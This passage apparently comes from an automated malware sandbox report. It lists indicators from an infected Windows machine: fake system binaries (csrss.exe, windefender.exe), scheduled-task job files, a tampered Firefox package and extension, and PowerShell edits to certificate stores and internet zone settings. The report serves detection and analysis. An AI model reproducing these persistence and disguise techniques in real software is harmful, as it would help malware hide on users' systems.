File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File opened for modification C:\Program Files (x86)\MyBurn\MyBurn.exe C:\Users\Admin\AppData\Local\Temp\is-JL1UK.tmp\is-AND0J.tmp N/A
File created C:\Program Files (x86)\oVhJPNkDU\juieFp.dll C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A
File created C:\Program Files (x86)\DlbZONUGhjVU2\wfvKKmV.xml C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File created C:\Program Files (x86)\MyBurn\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-JL1UK.tmp\is-AND0J.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-O2MDE.tmp C:\Users\Admin\AppData\Local\Temp\is-JL1UK.tmp\is-AND0J.tmp N/A
File created C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\XrdPiqO.xml C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File created C:\Program Files (x86)\MyBurn\is-N8OKB.tmp C:\Users\Admin\AppData\Local\Temp\is-JL1UK.tmp\is-AND0J.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-P6NU3.tmp C:\Users\Admin\AppData\Local\Temp\is-JL1UK.tmp\is-AND0J.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\ESE.TXT C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\Tasks\GyWbuVQzPmDmgkCMH.job C:\Windows\System32\Conhost.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\Tasks\HKFMMLmWpeGdwIqGl.job C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune C:\Users\Admin\AppData\Local\Temp\FD10.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\Tasks\bwpFiyeZPJPVdaMxTt.job C:\Windows\SysWOW64\reg.exe N/A
File created C:\Windows\Tasks\ztlTbPYifermRZH.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\3sO43CV.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\3sO43CV.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\3sO43CV.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS8B1.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS8B1.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\browser_broker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1832 = "Russia TZ 2 Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-672 = "AUS Eastern Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\System\CurrentControlSet C:\Windows\SysWOW64\schtasks.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-431 = "Iran Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\SysWOW64\rundll32.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2182 = "Astrakhan Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-51 = "Greenland Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2572 = "Turks and Caicos Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2181 = "Astrakhan Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-122 = "SA Pacific Standard Time" C:\Windows\windefender.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-592 = "Malay Peninsula Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-282 = "Central Europe Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2322 = "Sakhalin Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2752 = "Tomsk Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-771 = "Montevideo Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2452 = "Saint Pierre Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer\Main\OperationalData = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData\RulesFileNextUpdateDate = "404371778" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\ C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$vBulletin 3 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$MediaWiki C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
